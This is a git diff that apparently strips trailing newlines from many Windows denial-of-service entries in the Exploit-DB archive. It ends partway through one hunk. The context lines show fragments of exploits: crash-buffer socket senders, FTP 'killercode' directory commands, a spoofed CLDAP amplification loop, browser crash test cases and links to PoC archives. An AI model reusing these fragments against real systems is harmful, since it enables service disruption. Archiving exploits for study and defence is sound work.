b/platforms/windows/dos/40439.py index 83ddebc46..7b7d00a41 100755 --- a/platforms/windows/dos/40439.py +++ b/platforms/windows/dos/40439.py @@ -35,4 +35,4 @@ sa = httpd.socket.getsockname() print sa[0],sa[1],filecreate print "open vlc and open file {}".format(filecreate) print "LISTENING..",sa[0],sa[1],filecreate -httpd.serve_forever() +httpd.serve_forever() \ No newline at end of file diff --git a/platforms/windows/dos/4044.txt b/platforms/windows/dos/4044.txt index 4f102b7d0..2ec9abcda 100755 --- a/platforms/windows/dos/4044.txt +++ b/platforms/windows/dos/4044.txt @@ -7,4 +7,4 @@ highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4044.zip (06072007-CVE-2007-2237.zip) -# milw0rm.com [2007-06-07] +# milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/platforms/windows/dos/4046.pl b/platforms/windows/dos/4046.pl index d305698ee..e8a012adb 100755 --- a/platforms/windows/dos/4046.pl +++ b/platforms/windows/dos/4046.pl @@ -36,4 +36,4 @@ $sock->close; print "Exploited\n"; -# milw0rm.com [2007-06-07] +# milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/platforms/windows/dos/4047.c b/platforms/windows/dos/4047.c index 481828302..bba09b55a 100755 --- a/platforms/windows/dos/4047.c +++ b/platforms/windows/dos/4047.c @@ -126,4 +126,4 @@ main (int argc, char **argv) return (EXIT_SUCCESS); } -// milw0rm.com [2007-06-08] +// milw0rm.com [2007-06-08] \ No newline at end of file diff --git a/platforms/windows/dos/40536.py b/platforms/windows/dos/40536.py index 7d97130d4..c3016438b 100755 --- a/platforms/windows/dos/40536.py +++ b/platforms/windows/dos/40536.py @@ -141,5 +141,4 @@ def start(): ser=runHTTP(host,port) print "http://{}:{}/{}".format(host,port,filecreate) ser.serve_forever() -start() - +start() \ No newline at end of file diff --git a/platforms/windows/dos/4056.html b/platforms/windows/dos/4056.html index 2f8752094..9802ab5ef 100755 --- a/platforms/windows/dos/4056.html +++ b/platforms/windows/dos/4056.html @@ -19,4 +19,4 @@ arg1=String(999999, "A") + String(999999, unescape("%90")) idaiehlp.NotSafe (arg1) </script> -# milw0rm.com [2007-06-09] +# milw0rm.com [2007-06-09] \ No newline at end of file diff --git a/platforms/windows/dos/4058.py b/platforms/windows/dos/4058.py index c8bd31350..9ef7fe7c6 100755 --- a/platforms/windows/dos/4058.py +++ b/platforms/windows/dos/4058.py @@ -118,4 +118,4 @@ sleep(3) cl.close() s.close() -# milw0rm.com [2007-06-10] +# milw0rm.com [2007-06-10] \ No newline at end of file diff --git a/platforms/windows/dos/40598.txt b/platforms/windows/dos/40598.txt index 7d9558abd..c8b42d409 100755 --- a/platforms/windows/dos/40598.txt +++ b/platforms/windows/dos/40598.txt @@ -96,4 +96,4 @@ Attached is an archive with two proof of concept font files. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40598.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40598.zip \ No newline at end of file diff --git a/platforms/windows/dos/40599.txt b/platforms/windows/dos/40599.txt index 6c02669be..dedc3d48d 100755 --- a/platforms/windows/dos/40599.txt +++ b/platforms/windows/dos/40599.txt @@ -160,4 +160,4 @@ Attached is an archive with three proof of concept font files. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40599.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40599.zip \ No newline at end of file diff --git a/platforms/windows/dos/40600.txt b/platforms/windows/dos/40600.txt index 299921015..6963b43a9 100755 --- a/platforms/windows/dos/40600.txt +++ b/platforms/windows/dos/40600.txt @@ -47,4 +47,4 @@ Attached are three proof of concept hive files. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40600.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40600.zip \ No newline at end of file diff --git a/platforms/windows/dos/40601.txt b/platforms/windows/dos/40601.txt index d0f1625c7..1054c3ba9 100755 --- a/platforms/windows/dos/40601.txt +++ b/platforms/windows/dos/40601.txt @@ -52,5 +52,4 @@ The issue reproduces on Windows 7 and 8.1. In order to reproduce the problem wit Attached is a proof of concept hive file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40601.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40601.zip \ No newline at end of file diff --git a/platforms/windows/dos/40602.html b/platforms/windows/dos/40602.html index 64f02ee3b..19f7d9305 100755 --- a/platforms/windows/dos/40602.html +++ b/platforms/windows/dos/40602.html @@ -94,4 +94,4 @@ for(item in o){ alert(h); -</script></body></html> +</script></body></html> \ No newline at end of file diff --git a/platforms/windows/dos/40603.html b/platforms/windows/dos/40603.html index 73a3f419e..0261f4553 100755 --- a/platforms/windows/dos/40603.html +++ b/platforms/windows/dos/40603.html @@ -81,4 +81,4 @@ t.__proto__ = o; var j = []; var s = f.apply(null, t); -</script></body></html> +</script></body></html> \ No newline at end of file diff --git a/platforms/windows/dos/40604.html b/platforms/windows/dos/40604.html index 794078b5a..01dc5d60a 100755 --- a/platforms/windows/dos/40604.html +++ b/platforms/windows/dos/40604.html @@ -64,4 +64,4 @@ for(item in a){ } alert(h); -</script></body></html> +</script></body></html> \ No newline at end of file diff --git a/platforms/windows/dos/40605.html b/platforms/windows/dos/40605.html index 6795696bb..a2f764443 100755 --- a/platforms/windows/dos/40605.html +++ b/platforms/windows/dos/40605.html @@ -114,4 +114,4 @@ t.__proto__ = mp; q(...t); </script> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/40632.py b/platforms/windows/dos/40632.py index 1e447f042..e55a3f69f 100755 --- a/platforms/windows/dos/40632.py +++ b/platforms/windows/dos/40632.py @@ -24,5 +24,4 @@ ftp = FTP(ftp_ip) ftp.login(user, password) print ftp.login print "CRSAH CODE SENT!" -FTP.mkd(ftp, killercode) - +FTP.mkd(ftp, killercode) \ No newline at end of file diff --git a/platforms/windows/dos/40635.py b/platforms/windows/dos/40635.py index c82c660b1..9b4e8b25a 100755 --- a/platforms/windows/dos/40635.py +++ b/platforms/windows/dos/40635.py @@ -42,4 +42,4 @@ sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((hostname,port)) sock.send(buffer +'\r\n') sock.recv(1024) -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/windows/dos/40647.py b/platforms/windows/dos/40647.py index 807246e67..8884b6c81 100755 --- a/platforms/windows/dos/40647.py +++ b/platforms/windows/dos/40647.py @@ -96,4 +96,4 @@ ftp = FTP('127.0.0.1') ftp.login('anonymous', 'h4ck3r@h4ck3r.net') print ftp.login print "SERVER KILLED" -FTP.mkd(ftp, killerstring) +FTP.mkd(ftp, killerstring) \ No newline at end of file diff --git a/platforms/windows/dos/40649.html b/platforms/windows/dos/40649.html index aa68ae044..ec855283f 100755 --- a/platforms/windows/dos/40649.html +++ b/platforms/windows/dos/40649.html @@ -98,5 +98,4 @@ div_container.appendChild(obj); -</html> - +</html> \ No newline at end of file diff --git a/platforms/windows/dos/40656.txt b/platforms/windows/dos/40656.txt index 51404a6be..f187d709d 100755 --- a/platforms/windows/dos/40656.txt +++ b/platforms/windows/dos/40656.txt @@ -56,4 +56,4 @@ However, this doesn't change the fact that with the provided PoC, the pool alloc Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40656.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40656.zip \ No newline at end of file diff --git a/platforms/windows/dos/40657.txt b/platforms/windows/dos/40657.txt index c217c4b43..fd624e410 100755 --- a/platforms/windows/dos/40657.txt +++ b/platforms/windows/dos/40657.txt @@ -44,4 +44,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40657.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40657.zip \ No newline at end of file diff --git a/platforms/windows/dos/40658.txt b/platforms/windows/dos/40658.txt index ba988f0e6..07ff8d1ea 100755 --- a/platforms/windows/dos/40658.txt +++ b/platforms/windows/dos/40658.txt @@ -54,4 +54,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40658.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40658.zip \ No newline at end of file diff --git a/platforms/windows/dos/40659.txt b/platforms/windows/dos/40659.txt index fddbac413..153d68a0d 100755 --- a/platforms/windows/dos/40659.txt +++ b/platforms/windows/dos/40659.txt @@ -27,4 +27,4 @@ For completeness, it looks like many of the other escape handlers in the same fu Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40659.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40659.zip \ No newline at end of file diff --git a/platforms/windows/dos/40661.txt b/platforms/windows/dos/40661.txt index ac4010ebe..0e63668da 100755 --- a/platforms/windows/dos/40661.txt +++ b/platforms/windows/dos/40661.txt @@ -45,4 +45,4 @@ To reproduce, compile as a x64 executable and run (requires WDK for D3DKMTEscape Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40661.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40661.zip \ No newline at end of file diff --git a/platforms/windows/dos/40662.txt b/platforms/windows/dos/40662.txt index be81661e2..9c895b1a5 100755 --- a/platforms/windows/dos/40662.txt +++ b/platforms/windows/dos/40662.txt @@ -37,5 +37,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40662.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40662.zip \ No newline at end of file diff --git a/platforms/windows/dos/40663.txt b/platforms/windows/dos/40663.txt index 51e27a71d..a6ed838b6 100755 --- a/platforms/windows/dos/40663.txt +++ b/platforms/windows/dos/40663.txt @@ -39,4 +39,4 @@ To reproduce, compile PoC as a x64 executable and run (requires WDK for D3DKMTEs Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40663.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40663.zip \ No newline at end of file diff --git a/platforms/windows/dos/40664.txt b/platforms/windows/dos/40664.txt index cfe9672e2..4c8bc46bc 100755 --- a/platforms/windows/dos/40664.txt +++ b/platforms/windows/dos/40664.txt @@ -44,5 +44,4 @@ To reproduce, compile as an x64 executable an run (requires WDK for D3DKMTEscape Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40664.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40664.zip \ No newline at end of file diff --git a/platforms/windows/dos/40665.txt b/platforms/windows/dos/40665.txt index f226290bd..95debe418 100755 --- a/platforms/windows/dos/40665.txt +++ b/platforms/windows/dos/40665.txt @@ -57,4 +57,4 @@ fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd33 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40665.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40665.zip \ No newline at end of file diff --git a/platforms/windows/dos/40666.txt b/platforms/windows/dos/40666.txt index 42946bfa3..21289a9b7 100755 --- a/platforms/windows/dos/40666.txt +++ b/platforms/windows/dos/40666.txt @@ -52,5 +52,4 @@ Arg4: 0000000000000000, Reserved Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40666.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40666.zip \ No newline at end of file diff --git a/platforms/windows/dos/40667.txt b/platforms/windows/dos/40667.txt index 8dd65ea0c..424800139 100755 --- a/platforms/windows/dos/40667.txt +++ b/platforms/windows/dos/40667.txt @@ -28,4 +28,4 @@ ffffd000`23f95270 00000000`00000000 : 00000000`00000000 00000000`00000000 000000 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40667.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40667.zip \ No newline at end of file diff --git a/platforms/windows/dos/40668.txt b/platforms/windows/dos/40668.txt index d02975642..5201f4e8b 100755 --- a/platforms/windows/dos/40668.txt +++ b/platforms/windows/dos/40668.txt @@ -51,4 +51,4 @@ ffffd000`263bce88 00000000`00000000 : 00000c48`01380702 00010000`000166c2 000000 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40668.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40668.zip \ No newline at end of file diff --git a/platforms/windows/dos/4067.html b/platforms/windows/dos/4067.html index 5c10f9648..699715bc3 100755 --- a/platforms/windows/dos/4067.html +++ b/platforms/windows/dos/4067.html @@ -10,4 +10,4 @@ ctl.DeleteRecordSourceIfUnused(b); </script> </html> -# milw0rm.com [2007-06-13] +# milw0rm.com [2007-06-13] \ No newline at end of file diff --git a/platforms/windows/dos/40703.pl b/platforms/windows/dos/40703.pl index 0b4beb352..510750746 100755 --- a/platforms/windows/dos/40703.pl +++ b/platforms/windows/dos/40703.pl @@ -104,5 +104,4 @@ while () { $sock->set({ ip => { saddr => $target, daddr => $cldap}, udp => { source => 31337, dest => $port, data => $query} }); $sock->send; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/40745.c b/platforms/windows/dos/40745.c index e62e83abc..be75ea126 100755 --- a/platforms/windows/dos/40745.c +++ b/platforms/windows/dos/40745.c @@ -280,5 +280,4 @@ int __cdecl wmain(int nArgc, WCHAR** Argv) } while (FALSE); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/40748.html b/platforms/windows/dos/40748.html index 7df3d96bd..f2f39b9ba 100755 --- a/platforms/windows/dos/40748.html +++ b/platforms/windows/dos/40748.html @@ -107,5 +107,4 @@ November 2016: Details of this issue are released. fb­Test("123"); // (AV on x64 if page heap enabled). // This work by Sky­Lined is licensed under a Creative Commons // Attribution-Non-Commercial 4.0 International License. -</script> - +</script> \ No newline at end of file diff --git a/platforms/windows/dos/40766.txt b/platforms/windows/dos/40766.txt index f70ac915d..5975a2518 100755 --- a/platforms/windows/dos/40766.txt +++ b/platforms/windows/dos/40766.txt @@ -49,4 +49,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40766.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40766.zip \ No newline at end of file diff --git a/platforms/windows/dos/40773.html b/platforms/windows/dos/40773.html index 0b7cf10ec..502ebd5f4 100755 --- a/platforms/windows/dos/40773.html +++ b/platforms/windows/dos/40773.html @@ -14,4 +14,4 @@ var p = new Proxy(eval, {}); p("alert(\"e\")"); </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/40779.py b/platforms/windows/dos/40779.py index fc112c9d1..b506d2333 100755 --- a/platforms/windows/dos/40779.py +++ b/platforms/windows/dos/40779.py @@ -29,5 +29,4 @@ payload4 = 'GET /. HTTP/1.1\r\n\r\n' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(payload1) -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/40785.html b/platforms/windows/dos/40785.html index 10018e1a5..d34388f59 100755 --- a/platforms/windows/dos/40785.html +++ b/platforms/windows/dos/40785.html @@ -164,5 +164,4 @@ alert(h); </script> </body> -</html> - +</html> \ No newline at end of file diff --git a/platforms/windows/dos/40787.html b/platforms/windows/dos/40787.html index 735988025..1cc30a1ce 100755 --- a/platforms/windows/dos/40787.html +++ b/platforms/windows/dos/40787.html @@ -85,4 +85,4 @@ a[0xfffff1ec - 1] = 10; </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/40825.py b/platforms/windows/dos/40825.py index c52c143d9..d5423a91b 100755 --- a/platforms/windows/dos/40825.py +++ b/platforms/windows/dos/40825.py @@ -19,4 +19,4 @@ while (counter <= 5000): print(counter) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('<host address>',5650)) - s.close() + s.close() \ No newline at end of file diff --git a/platforms/windows/dos/40828.py b/platforms/windows/dos/40828.py index db90ac263..0a65c75f6 100755 --- a/platforms/windows/dos/40828.py +++ b/platforms/windows/dos/40828.py @@ -121,4 +121,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/dos/40849.py b/platforms/windows/dos/40849.py index 7f7fcf167..9af81c9c7 100755 --- a/platforms/windows/dos/40849.py +++ b/platforms/windows/dos/40849.py @@ -98,4 +98,4 @@ payload = ( s.send(payload) s.close -print 'BOOM! \n' +print 'BOOM! \n' \ No newline at end of file diff --git a/platforms/windows/dos/40875.html b/platforms/windows/dos/40875.html index dc1967b64..5273272e7 100755 --- a/platforms/windows/dos/40875.html +++ b/platforms/windows/dos/40875.html @@ -61,4 +61,4 @@ s = s + n.toString(16); alert(s); </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/40878.txt b/platforms/windows/dos/40878.txt index 08ef3b86e..79346e401 100755 --- a/platforms/windows/dos/40878.txt +++ b/platforms/windows/dos/40878.txt @@ -29,4 +29,4 @@ Time-line August 2015: This vulnerability was found through fuzzing. August 2015: This vulnerability was submitted to ZDI. December 2015: Microsoft addresses this vulnerability in MS15-125. -December 2016: Details of this vulnerability are released. +December 2016: Details of this vulnerability are released. \ No newline at end of file diff --git a/platforms/windows/dos/40880.txt b/platforms/windows/dos/40880.txt index 0d9c31172..bf0754b32 100755 --- a/platforms/windows/dos/40880.txt +++ b/platforms/windows/dos/40880.txt @@ -72,4 +72,4 @@ Time-line 18 May 2016: This vulnerability was reported to MSRC and I informed Edge developers directly on the seriousness of the bug. 18 May 2016: The issue was hidden in public bug tracker. 14 June 2016: Microsoft addresses this vulnerability in MS16-068. -December 2016: Details of this vulnerability are released. +December 2016: Details of this vulnerability are released. \ No newline at end of file diff --git a/platforms/windows/dos/40883.py b/platforms/windows/dos/40883.py index b4c3c9661..c9d33a111 100755 --- a/platforms/windows/dos/40883.py +++ b/platforms/windows/dos/40883.py @@ -56,4 +56,4 @@ def main(): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/dos/40885.py b/platforms/windows/dos/40885.py index 4324cf750..03dcdbb67 100755 --- a/platforms/windows/dos/40885.py +++ b/platforms/windows/dos/40885.py @@ -58,5 +58,4 @@ else: #The method doesn't really matters. It gets valideted only about the length request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n" -send_request(host,port,request.replace("{REPLACE}",evil)) - +send_request(host,port,request.replace("{REPLACE}",evil)) \ No newline at end of file diff --git a/platforms/windows/dos/40905.py b/platforms/windows/dos/40905.py index b78cda58b..bc003939e 100755 --- a/platforms/windows/dos/40905.py +++ b/platforms/windows/dos/40905.py @@ -69,4 +69,4 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(251) s.send('z') -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/dos/40907.html b/platforms/windows/dos/40907.html index a6ffdcdba..1afad262a 100755 --- a/platforms/windows/dos/40907.html +++ b/platforms/windows/dos/40907.html @@ -44,4 +44,4 @@ Time-line 15 February 2013: This vulnerability was disclosed to Microsoft by ZDI. 27 June 2013: This vulnerability was address by Microsoft in MS13-047. 12 December 2016: Details of this vulnerability are released. ---> +--> \ No newline at end of file diff --git a/platforms/windows/dos/40915.txt b/platforms/windows/dos/40915.txt index f74da88c0..6f57f4ba8 100755 --- a/platforms/windows/dos/40915.txt +++ b/platforms/windows/dos/40915.txt @@ -130,4 +130,4 @@ is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/windows/dos/40925.py b/platforms/windows/dos/40925.py index 6843b029b..426218773 100755 --- a/platforms/windows/dos/40925.py +++ b/platforms/windows/dos/40925.py @@ -127,4 +127,4 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(251) s.send(hello+buffer+bye) -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/dos/40926.py b/platforms/windows/dos/40926.py index 4ccdda999..530c801e2 100755 --- a/platforms/windows/dos/40926.py +++ b/platforms/windows/dos/40926.py @@ -127,4 +127,4 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(251) s.send(hello+buffer+bye) -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/dos/40927.py b/platforms/windows/dos/40927.py index 93d498bbe..42499f265 100755 --- a/platforms/windows/dos/40927.py +++ b/platforms/windows/dos/40927.py @@ -177,4 +177,4 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(17) s.send(hello+buffer+bye) -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/dos/40947.html b/platforms/windows/dos/40947.html index 040e4c3f8..e95f20e00 100755 --- a/platforms/windows/dos/40947.html +++ b/platforms/windows/dos/40947.html @@ -33,4 +33,4 @@ If the call has more than three arguments, it will fall through, leaving newArgs alert(e.message); } -</script></body></html> +</script></body></html> \ No newline at end of file diff --git a/platforms/windows/dos/40948.html b/platforms/windows/dos/40948.html index 67d21d03f..c053324c1 100755 --- a/platforms/windows/dos/40948.html +++ b/platforms/windows/dos/40948.html @@ -61,4 +61,4 @@ Object.defineProperty(Object, "defineProperty", pattern); var q = new Intl.NumberFormat(["en"]); -</script></body></html> +</script></body></html> \ No newline at end of file diff --git a/platforms/windows/dos/40965.py b/platforms/windows/dos/40965.py index 348ad37ec..5e6942372 100755 --- a/platforms/windows/dos/40965.py +++ b/platforms/windows/dos/40965.py @@ -93,4 +93,4 @@ upfile="Exoploit_ftpshell.csv" file=open(upfile,"w") file.write(EXp) file.close() -print 'done:- {}'.format(upfile) +print 'done:- {}'.format(upfile) \ No newline at end of file diff --git a/platforms/windows/dos/41018.txt b/platforms/windows/dos/41018.txt index 17cd4a687..f4a9a93a0 100755 --- a/platforms/windows/dos/41018.txt +++ b/platforms/windows/dos/41018.txt @@ -199,6 +199,4 @@ of vulnerability-lab team & the specific authors or managers. To record, list, m -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/dos/41042.html b/platforms/windows/dos/41042.html index b5330334b..d78b29a3f 100755 --- a/platforms/windows/dos/41042.html +++ b/platforms/windows/dos/41042.html @@ -103,5 +103,4 @@ <body onload='testcase();'> <iframe src='about:blank' id='t1' width="100%"></iframe> </body> -</html> - +</html> \ No newline at end of file diff --git a/platforms/windows/dos/4118.html b/platforms/windows/dos/4118.html index 740832bdf..d60f6d5c1 100755 --- a/platforms/windows/dos/4118.html +++ b/platforms/windows/dos/4118.html @@ -11,4 +11,4 @@ site: http://www.ph4nt0m.org </body> </smil> -# milw0rm.com [2007-06-27] +# milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/platforms/windows/dos/4120.html b/platforms/windows/dos/4120.html index be1f9ae8f..c8011fc0f 100755 --- a/platforms/windows/dos/4120.html +++ b/platforms/windows/dos/4120.html @@ -21,4 +21,4 @@ End Sub <input language=VBScript onclick=tryMe() type=button value="Click Me"> -# milw0rm.com [2007-06-27] +# milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/platforms/windows/dos/4121.txt b/platforms/windows/dos/4121.txt index 21f7b9e9c..8740ef2e0 100755 --- a/platforms/windows/dos/4121.txt +++ b/platforms/windows/dos/4121.txt @@ -6,4 +6,4 @@ Tested on: Full Patched Excel 2003 Sp2, CN https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip) -# milw0rm.com [2007-06-27] +# milw0rm.com [2007-06-27] \ No newline at end of file diff --git a/platforms/windows/dos/41222.py b/platforms/windows/dos/41222.py index 85a3df20d..377a8b60d 100755 --- a/platforms/windows/dos/41222.py +++ b/platforms/windows/dos/41222.py @@ -424,4 +424,4 @@ class SMB2(SocketServer.BaseRequestHandler): SocketServer.TCPServer.allow_reuse_address = 1 launch = SocketServer.TCPServer(('', 445),SMB2) -launch.serve_forever() +launch.serve_forever() \ No newline at end of file diff --git a/platforms/windows/dos/4126.c b/platforms/windows/dos/4126.c index 579359e7c..db1b80bd0 100755 --- a/platforms/windows/dos/4126.c +++ b/platforms/windows/dos/4126.c @@ -75,4 +75,4 @@ int main() return 0; } -// milw0rm.com [2007-06-29] +// milw0rm.com [2007-06-29] \ No newline at end of file diff --git a/platforms/windows/dos/41363.txt b/platforms/windows/dos/41363.txt index 37f23d742..599ca60ed 100755 --- a/platforms/windows/dos/41363.txt +++ b/platforms/windows/dos/41363.txt @@ -28,4 +28,4 @@ It is strongly advised to perform a careful audit of all EMF record handlers res Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41363.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41363.zip \ No newline at end of file diff --git a/platforms/windows/dos/41364.txt b/platforms/windows/dos/41364.txt index c903a2951..1c5146322 100755 --- a/platforms/windows/dos/41364.txt +++ b/platforms/windows/dos/41364.txt @@ -38,4 +38,4 @@ fffff801`0e34a50b 418b02 mov eax,dword ptr [r10] ds:ffffd000`266230 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41364.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41364.zip \ No newline at end of file diff --git a/platforms/windows/dos/41365.txt b/platforms/windows/dos/41365.txt index 6f830b188..074470779 100755 --- a/platforms/windows/dos/41365.txt +++ b/platforms/windows/dos/41365.txt @@ -74,4 +74,4 @@ Resetting default scope Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41365.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41365.zip \ No newline at end of file diff --git a/platforms/windows/dos/41367.txt b/platforms/windows/dos/41367.txt index 94b71bdea..25eb99f4b 100755 --- a/platforms/windows/dos/41367.txt +++ b/platforms/windows/dos/41367.txt @@ -77,5 +77,4 @@ Invalid exception stack at ffffffff 2017-02-09 information sent with the PoC no reply if they plan to release a fix or not - - + \ No newline at end of file diff --git a/platforms/windows/dos/4137.html b/platforms/windows/dos/4137.html index b1f4e4866..efd566eb4 100755 --- a/platforms/windows/dos/4137.html +++ b/platforms/windows/dos/4137.html @@ -40,4 +40,4 @@ </script> </html> -# milw0rm.com [2007-07-02] +# milw0rm.com [2007-07-02] \ No newline at end of file diff --git a/platforms/windows/dos/41417.txt b/platforms/windows/dos/41417.txt index 63938858e..c9b68ba17 100755 --- a/platforms/windows/dos/41417.txt +++ b/platforms/windows/dos/41417.txt @@ -80,4 +80,4 @@ In this crash eax is pointing to an invalid memory region and is being dereferen Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41417.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41417.zip \ No newline at end of file diff --git a/platforms/windows/dos/41418.txt b/platforms/windows/dos/41418.txt index 70ff4bd3d..c7272e098 100755 --- a/platforms/windows/dos/41418.txt +++ b/platforms/windows/dos/41418.txt @@ -113,4 +113,4 @@ Looking at the logic flow from this function we see at the very first call to ms Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41418.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41418.zip \ No newline at end of file diff --git a/platforms/windows/dos/41419.txt b/platforms/windows/dos/41419.txt index bc6bc5755..98a92ff37 100755 --- a/platforms/windows/dos/41419.txt +++ b/platforms/windows/dos/41419.txt @@ -72,4 +72,4 @@ The issue here is that when dbcs_flag is false the 4 byte boundary version can a Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41419.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41419.zip \ No newline at end of file diff --git a/platforms/windows/dos/41474.py b/platforms/windows/dos/41474.py index 369590be5..a492ba87d 100755 --- a/platforms/windows/dos/41474.py +++ b/platforms/windows/dos/41474.py @@ -28,4 +28,4 @@ while True: conn.recv(1024) conn.send('250 '+buffer+'\r\n') conn.close() - + \ No newline at end of file diff --git a/platforms/windows/dos/41475.py b/platforms/windows/dos/41475.py index 54cc6f1bb..2cfec507f 100755 --- a/platforms/windows/dos/41475.py +++ b/platforms/windows/dos/41475.py @@ -78,5 +78,4 @@ while i < 957: except: print("[-] The service seems to be down.\r\n") print("[!] It can take a few seconds for the service to crash\r\n") - break - + break \ No newline at end of file diff --git a/platforms/windows/dos/4148.html b/platforms/windows/dos/4148.html index 454d2142c..7ef9bf588 100755 --- a/platforms/windows/dos/4148.html +++ b/platforms/windows/dos/4148.html @@ -75,4 +75,4 @@ ngssoftware["PrepareToPostHTML"](foo); <BODY bgColor=#ffffff onload=init()> </BODY></HTML> -# milw0rm.com [2007-07-05] +# milw0rm.com [2007-07-05] \ No newline at end of file diff --git a/platforms/windows/dos/4149.html b/platforms/windows/dos/4149.html index 669356162..103fc57a3 100755 --- a/platforms/windows/dos/4149.html +++ b/platforms/windows/dos/4149.html @@ -73,4 +73,4 @@ 